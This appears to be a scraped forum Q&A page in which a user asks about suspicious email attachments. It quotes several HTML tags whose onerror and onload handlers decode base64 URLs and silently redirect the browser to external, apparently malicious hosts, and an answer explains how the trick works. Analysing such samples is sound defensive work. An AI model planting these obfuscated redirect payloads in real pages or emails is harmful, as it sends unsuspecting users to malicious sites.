Home > Software engineering >  JS Virus in mail?
JS Virus in mail?

Time:10-17

I receive emails with some xhtml files. I find these files to be suspicious. They contain JS code:

<video src="123" one rror="document.location.replace(window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/NzMyNDI0MzgxMjQ4Nzc1OCA='));">

<img src="awbdsdrDYZZZCN33.jpg" onerror="document.location.href=window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/MzEyNjg4ODA3NjM3Mzc1NzEg');">  

<body onload="document.location.replace(window.atob('aHR0cDovL3J1c25nLnByby80d1FKZEQ/NTU2MzQ2NzY1MzIwNjI1MSA='));" />

<link rel="stylesheet" type="text/css" href="1.css" onerror="document.location.replace(window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/NDg0NDUwNTc4NzAxMjMyIA=='));" />

<body onload="document.location.href=window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/MTE1MzQ1MDI0NTExMDQ2NzM0NCA=');" />

I am wondering how malicious this codes is. And what action do these files do with OS?

CodePudding user response:

It redirects you to http://keitaro0001.pro/DcLtdS?7324243812487758.

It purposefully uses an incorrect src property to fire the error event (since the file at that source does not exist), executing the JS in the onerror attribute:

document.location.replace(window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/NzMyNDI0MzgxMjQ4Nzc1OCA='));

The string in question is base64 encoded. window.atob decodes the base64 encoded string (which is the URL above) and assigns it to the URL.

Page link:https//www.codepudding.com/Softwareengineering/155530.html

Prev:How can I get only the users with roles of 'user'?
Next:How to update email and sensitive data properly in Firebase?
  • Related

About Us:  Contact Us      Terms of Service       Privacy Policy

Copyright © 2010-2023,Powered By CodePudding